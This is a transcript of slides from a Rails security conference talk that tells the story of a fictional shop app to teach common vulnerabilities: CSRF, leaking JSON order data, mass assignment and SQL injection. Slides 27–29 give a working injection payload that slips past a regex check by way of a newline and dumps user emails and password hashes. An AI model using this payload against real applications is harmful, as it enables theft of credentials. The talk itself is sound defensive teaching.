Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Tales from the Crypt

Tales from the Crypt

In this talk, three Rails security specialists will take a journey through a terrifying Rails application to illustrate common security problems we have seen in the real world. The discussion will include how to identify, fix, and prevent the issues with an emphasis on practical advice. Along the way we will share our experiences and perspectives concerning securely implementing applications. We hope it is a bit scary, and yet fun … like a horror movie!

Justin Collins

April 25, 2014
Tweet

More Decks by Justin Collins

Other Decks in Technology

Transcript

  1. Tales from the Crypt:
    Rubazzle
    Justin Collins
    Aaron Bedra
    Matt Konda

    View Slide

  2. View Slide

  3. Monday, Rubazzle
    office, 8:42am

    View Slide

  4. Started POST "/orders" for 127.0.0.1 at 2014-04-23
    12:07:54 -0500
    !
    Processing by OrdersController#create as HTML
    Parameters: {"utf8"=>"✓", “order"=>
    {"product"=>"Rubazzle Case (MBP 13 Retina)",
    "quantity"=>"5", "price"=>"100.00",
    "cc"=>"4111111111111111", "cvv"=>"123",
    "expiration"=>"4/28/17", "first_name"=>"Aaron",
    "last_name"=>"Bedra"}, "commit"=>"Create Order"}
    !
    Request tracked from partner:
    http://wowsodogememe.com/view.php?id=31337
    !
    Redirected to http://www.rubazzle.com/orders/2349
    Completed 302 Found in 35ms (ActiveRecord: 5.8ms)

    View Slide

  5. Started POST "/orders" for 127.0.0.1 at 2014-04-23
    12:07:54 -0500
    !
    Processing by OrdersController#create as HTML
    Parameters: {"utf8"=>"✓", “order"=>
    {"product"=>"Rubazzle Case (MBP 13 Retina)",
    "quantity"=>"5", "price"=>"100.00",
    "cc"=>"4111111111111111", "cvv"=>"123",
    "expiration"=>"4/28/17", "first_name"=>"Aaron",
    "last_name"=>"Bedra"}, "commit"=>"Create Order"}
    !
    Request tracked from partner:
    http://wowsodogememe.com/view.php?id=31337
    !
    Redirected to http://www.rubazzle.com/orders/2349
    Completed 302 Found in 35ms (ActiveRecord: 5.8ms)

    View Slide

  6. View Slide

  7. View Slide

  8. !
    !
    !
    !
    !
    document.getElementById("rubazzle").submit()

    View Slide

  9. class ApplicationController <
    ActionController::Base
    # Prevent CSRF attacks by raising an exception.
    # protect_from_forgery with: :exception
    !
    def track_partner
    logger.debug("Request tracked from partner:
    #{request.env["HTTP_REFERER"]}")
    end
    end

    View Slide

  10. Monday, Rubazzle
    office, 10:00am

    View Slide

  11. Started GET "/orders/2.json" for 75.28.130.156 at 2014-04-23 13:57:28 -0500
    Processing by OrdersController#show as JSON
    Parameters: {"id"=>"2"}
    Request tracked from partner:
    Order Load (0.4ms) SELECT "orders".* FROM "orders" WHERE "orders"."id" = $1 LIMIT 1 [["id", 2]]
    Rendered orders/show.json.jbuilder (0.7ms)
    Completed 200 OK in 6ms (Views: 4.1ms | ActiveRecord: 0.4ms)
    !
    !
    Started GET "/orders/3" for 75.28.130.156 at 2014-04-23 13:57:28 -0500
    Processing by OrdersController#show as */*
    Parameters: {"id"=>"3"}
    Request tracked from partner:
    Order Load (0.3ms) SELECT "orders".* FROM "orders" WHERE "orders"."id" = $1 LIMIT 1 [["id", 3]]
    Rendered orders/show.html.erb within layouts/application (0.5ms)
    Rendered layouts/_navigation_links.html.erb (0.9ms)
    Rendered layouts/_navigation.html.erb (5.8ms)
    Rendered layouts/_messages.html.erb (0.1ms)
    Completed 200 OK in 32ms (Views: 29.6ms | ActiveRecord: 0.3ms)
    !
    !
    Started GET "/orders/3.json" for 75.28.130.156 at 2014-04-23 13:57:28 -0500
    Processing by OrdersController#show as JSON
    Parameters: {"id"=>"3"}
    Request tracked from partner:
    Order Load (0.3ms) SELECT "orders".* FROM "orders" WHERE "orders"."id" = $1 LIMIT 1 [["id", 3]]
    Rendered orders/show.json.jbuilder (0.5ms)
    Completed 200 OK in 5ms (Views: 3.2ms | ActiveRecord: 0.3ms)

    View Slide

  12. Started GET "/orders/2.json" for 75.28.130.156
    at 2014-04-23 13:57:28 -0500
    Processing by OrdersController#show as JSON
    Parameters: {"id"=>"2"}
    Rendered orders/show.json.jbuilder (0.7ms)
    Completed 200 OK in 6ms
    !
    Started GET "/orders/3.json" for 75.28.130.156
    at 2014-04-23 13:57:28 -0500
    Processing by OrdersController#show as JSON
    Parameters: {"id"=>"3"}
    Rendered orders/show.json.jbuilder (0.5ms)
    Completed 200 OK in 5ms

    View Slide

  13. View Slide

  14. View Slide

  15. View Slide

  16. Most requested
    ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
    OrdersController#show.JSON ┃ 130 hits ┃ 28.7% ┃ ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
    OrdersController#show.*/* ┃ 97 hits ┃ 21.0% ┃ ░░░░░░░░░░░░░░░░░░░░░░░
    HomeController#index.HTML ┃ 83 hits ┃ 15.8% ┃ ░░░░░░░░░░░░░░░░░░

    View Slide

  17. View Slide

  18. {
    "id":2,
    "product":"a",
    "quantity":,
    "price":"3.0",
    "cc":"143423433234342234",
    "cvv":"342",
    "expiration":"May,2010",
    "first_name":"Matt",
    "last_name":"Konda",
    "created_at":"2014-04-22T20:11:39Z",
    "updated_at":"2014-04-22T20:11:50Z"
    }

    View Slide

  19. Monday, Rubazzle
    office, 3:00pm

    View Slide

  20. View Slide

  21. View Slide

  22. View Slide

  23. View Slide

  24. @qualifying_orders =
    Order.where("rewards_code =
    '#{current_user.rewards_code}'")

    View Slide

  25. validates_format_of :rewards_code,
    :with => /^[a-z0-9]+$/i

    View Slide

  26. def update
    @user = User.find(params[:id])
    authorize @user
    if @user.update_attributes(params.permit!)
    redirect_to users_path,
    :notice => "User updated."
    else
    redirect_to users_path,
    :alert => "Unable to update user."
    end
    end

    View Slide

  27. !
    curl 'http://www.rubazzle.com/users' -H 'Cookie: request_method=GET;
    _rubazzle_session=Y05oRmJqTFpEcXhaQ01QNEh4dXU5Z1BLd0dBNDBFc2VuNDRnek
    lwZlpCMUV4VlN1cCtpYTdhUnhWd01mV2ovTjlMRmJHWTcyc29RaWNOSGE1NjhBUTFJMV
    o4SThPTG4xcjNiM1hXc2hKUU5ZZkpvOGI4dis5dGw3TlU0L0VMMEg1NHpzODVqYmdlcV
    U2YzVERHBkb3hFdmZGeTB6VXVNOFpCTi9IZUtaTDlQMUxuODRTb0JSaW5GNGZhZzhSdU
    pIdjVKVDNUbC94NzRnaDlJdW5vWjVVaVZJUjJSQmVUYU1RZnB5Tm1Icmw0UT0tLVFSan
    A0TVh2a3FZbDcreG50Z0p6REE9PQ%3D
    %3D--51a22556b9f2567c46943497f09d03680ecde340' -H 'Origin: http://
    www.rubazzle.com' -H 'Accept-Encoding: gzip,deflate,sdch' -H
    'Accept-Language: en-US,en;q=0.8' -H 'User-Agent: Mozilla/5.0
    (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/34.0.1847.116 Safari/537.36' -H 'Content-Type:
    application/x-www-form-urlencoded' -H 'Accept: text/
    html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/
    *;q=0.8' -H 'Cache-Control: max-age=0' -H 'Referer: http://
    www.rubazzle.com/users/edit' -H 'Connection: keep-alive' --data
    'utf8=%E2%9C
    %93&_method=put&authenticity_token=HDN82RYSeMrhOi8gMCTPp9OWBdA9lJmXj
    tJvnSAOz2U%3D&user%5Bname%5D=Ronica2+Rails&user%5Bemail%5D=ronika
    %40jemurai.com&user%5Bpassword%5D=&user%5Brewards_code%5D=a%0A
    %27%29+union+select+id%2C+%27product%27%2C+1%2C+1%2C+%27cc%27%2C+
    %27cvv%27%2C+%27expiration%27%2C+email+as+first_name%2C
    +encrypted_password+as+last_name%2C+created_at%2C+updated_at%2C+id
    %2C+%27reward%27+from+users%3B+--&user%5Bpassword_confirmation
    %5D=&user%5Bcurrent_password%5D=password&commit=Update' --compressed

    View Slide

  28. UPDATE "users"
    SET "rewards_code" = $1, "updated_at" = $2
    WHERE "users"."id" = 24
    !
    [["rewards_code", "a\n') union select id,
    'product', 1, 1, 'cc', 'cvv',
    'expiration',
    email as first_name,
    encrypted_password as last_name,
    created_at, updated_at, id, 'reward'
    from users; --"], ["updated_at",
    "2014-04-23 22:20:40.344101"]]

    View Slide

  29. SELECT "orders".* FROM "orders"
    WHERE
    (rewards_code = 'a')
    union select id, 'product', 1, 1,
    'cc', 'cvv', 'expiration', email
    as
    first_name, encrypted_password
    as
    last_name, created_at, updated_at,
    id, 'reward' from users; --')

    View Slide

  30. View Slide

  31. Tuesday, Rubazzle
    office, 8:00am

    View Slide

  32. Thanks!
    Resources!
    • rails-sqli.org
    • guides.rubyonrails.org/security.html
    • www.owasp.org/index.php/Ruby_on_Rails_Cheatsheet
    Us!
    • @abedra
    • @mkonda
    • @presidentbeef
    Thanks Railsconf!

    View Slide